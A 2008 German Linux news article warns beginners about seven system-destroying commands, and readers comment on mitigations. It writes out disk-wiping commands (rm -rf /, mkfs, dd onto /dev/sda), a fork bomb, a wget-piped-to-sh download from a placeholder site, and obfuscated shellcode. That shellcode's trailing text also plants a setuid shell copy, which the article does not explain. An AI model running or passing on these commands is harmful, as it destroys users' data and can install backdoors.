Die 7 tödlichsten Linux-Kommandos

Die 7 tödlichsten Linux-Kommandos

Tim Schürmann
21.11.2008

Der Informatikstudent Jun Auza hat in seinem TechSource Blog die siebentödlichsten Linux Kommandos zusammengetragen, die von seinen Lesernbereits fleißig um weitere Befehle ergänzt wurden. Jun Auza will mit derAufstellung insbesondere Einsteiger warnen, nicht auf angebliche Tricks von"dummen Leuten" in Foren oder Chats hereinzufallen.

Achtung! Alle im Blog und hier genannten Kommandos zerstörenwirklich ein komplettes Linux-System. Wer sie ausprobieren möchte,sollte sie am Besten in einer abgeschlossenen, virtuellen Maschine loslassen.In jedem Fall erfolgt ihre Anwendung auf eigene Gefahr!

  1. Ein Klassiker unter den Befehlen ist sicherlich
    rm -rf /
    
    Er beginnt beim Wurzelverzeichnis und löscht dann rekursiv alle anderenUnterverzeichnisse ohne weitere Nachfragen. Die Festplatte und sämtlicheeingehängten Datenträger sind anschließend leer.
  2. Als Abwandlung des ersten Befehls nennt das Blog das ziemlich kryptische
    char esp[] __attribute__ ((section(".text"))) /* e.s.p
    release */
    = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
    "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
    "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
    "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
    "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
    "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
    "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
    "cp -p /bin/sh /tmp/.beyond; chmod 4755
    /tmp/.beyond;";
    
    Dahinter verbirgt sich nichts anderes als die mit Hex-Zahlen codierte Fassungvon
    rm -rf /
    Diese unleserliche "Verpackung" soll die wahreFunktion möglichst geschickt verschleiern.
  3. Etwas schneller als das Löschen aller Verzeichnisse wäre eineFormatierung, zum Beispiel mit dem ext3-Dateisystem:
    mkfs.ext3 /dev/sda
    
    Dieser Befehl versetzt die komplette erste Festplatte (sda) ineinen jungfräulichen Zustand.
  4. Stürzen sich die ersten drei Befehle noch auf Datenträger, wischt
    :(){:|:&};:
    
    im Hauptspeicher feucht durch. Diese kryptische Zeile ist auch als forkbombbekannt. Sie produziert so lange neue Prozesse, bis das komplette Systemeinfriert und es nebenbei vielleicht noch zu einem Datenverlust kommt. Nimmtman den Befehl in ein Startskript auf, dürfe eine Anmeldung am System zumindestetwas erschwert werden.
  5. Doch zurück zur Festplatte:
    irgendeinkommando > /dev/sda
    
    Dabei steht irgendeinkommando für ein beliebiges Programm, das alsErgebnis ein paar Daten im Terminal ausspuckt. Diese schreibt der Befehl dannohne Umweg auf die erste Festplatte. In der Regel wandern dabei sämtlicheInformationen über die Partitionierung und die Dateisysteme über den Jordan.
  6. Auch für Linux existieren so genannte Root-Kits. Diese Schadprogrammenisten sich unbemerkt im System ein und verwandeln den PC in einen willenlosenZombie. Um einen Computer zu infizieren, sucht man sich im Internet einepassende Quelle und wirft dann wget an:
    wget http://www.unsicherewebseite.com -O- | sh
    
    Dieses Kommando lädt nicht nur den kompletten Internetauftritt vonunsicherewebseite.com herunter, sondern führt auch sämtlichen von dortstammenden Programmcode ohne zu murren aus.
  7. Als letzte Gefahr nennt Jun Auza in seinem Blog das /dev/nullGerät. Alles, was man dort hinschickt, wie zum Beispiel sein eigenesHeimatverzeichnis:
    mv /home/meins/* /dev/null
    
    wandert unwiederbringlich in einen virtuellen Mülleimer.

Wie die nach wie vor stetig wachsenden Kommentare im Blog zeigen, existierennoch viele weitere Methoden, sein Linux-System zu zerstören. Beispielsweisefüllt

dd if=/dev/urandom of=/dev/sda

die komplette erste Festplattemit zufälligen Zahlen.

Als Benutzer sollte man generell allen Befehlen misstrauisch gegenüber stehen,die Root-Rechte verlangen und rm -rf, dd, eine Weiterleitung (via | oder >) oder eine Festplatte (zum Beispiel "/dev/sda") als Parameter enthalten.

Ähnliche Artikel

  • Demontage
    Unter Windows laufen Sie stets Gefahr, mit unachtsamen Mausklicks das gesamte System irreparabel zu zerstören. Aber auch das freie Betriebssystem befördern Sie ruck, zuck ins Jenseits – wie, das zeigt der gefährlichste Artikel in der Geschichte des LinuxUser.
  • 20 Coole Hintergrundbilder für Netbooks
    Der auf den Philipinen lebende Linux-Fan Jun Auza hat in seinem Blog die seiner Meinung nach 20 besten Hintergrundbilder im Eee-PC-Format gesammelt.

Kommentare
Re: Die 7 tödlichsten Linux-Kommandos
Lars S., Freitag, 21. November 2008 19:14:12
Ein/Ausklappen

Diese "Deadly Commands" lassen sich ganz einfach entschärfen:
Die richtigen Rechte setzen, schon laufen 1), 2), 3) und 5) in's Leere, das heißt, der normale User bekommt nur eine Fehlermeldung.
Weil, normale User haben (bzw. sollten) keine Berechtigung haben /bin/, /sbin und generell / leerzufegen.
Und 'root' sollte wissen was er tut und erkennen was die Befehle bewirken können. :-)
Gegen 3) hilft das setzen von Limits in der /etc/security/limits.conf.
Dazu ist sie ja da.
Also sind auch solche Forkbombs entschärft.
Und gegen Schäden durch 6) und 7) hat man ja Backups von /home.

Also alles halb so wild.


[1] http://www.linux-hamburg.de/limits.html



Bewertung: 225 Punkte bei 39 Stimmen.
Den Beitrag bewerten: Gut / Schlecht
-
Re: Die 7 tödlichsten Linux-Kommandos
Lars S., Samstag, 22. November 2008 06:55:47
Ein/Ausklappen

Finde gerade die Edit nicht... :-)

> Gegen 3) hilft das setzen von Limits in der /etc/security/limits.conf.

Soll natürlich heißen: Gegen 4) hilft das setzen von Limits in der /etc/security/limits.conf.


Bewertung: 220 Punkte bei 30 Stimmen.
Den Beitrag bewerten: Gut / Schlecht

Aktuelle Fragen

PCLinuxOS Version 2014.08 "FullMonty" Umstellung auf deutsch
Karl-Heinz Welz, 19.12.2014 09:55, 3 Antworten
Hallo, liebe Community, ich bin 63 Jahre alt und möchte jetzt nach Jahrzehnten Windows zu Linux...
ICEauthority
Thomas Mann, 17.12.2014 14:49, 2 Antworten
Fehlermeldung beim Start von Linux Mint: Could not update ICEauthority file / home/user/.ICEauth...
Linux einrichten
Sigrid Bölke, 10.12.2014 10:46, 5 Antworten
Hallo, liebe Community, bin hier ganz neu,also entschuldigt,wenn ich hier falsch bin. Mein Prob...
Externe USB-Festplatte mit Ext4 formatiert, USB-Stick wird nicht mehr eingebunden
Wimpy *, 02.12.2014 16:31, 0 Antworten
Hallo, ich habe die externe USB-FP, die nur für Daten-Backup benutzt wird, mit dem YaST-Partition...
Steuern mit Linux
Siegfried Markner, 01.12.2014 11:56, 2 Antworten
Welches Linux eignet sich am besten für Steuerungen.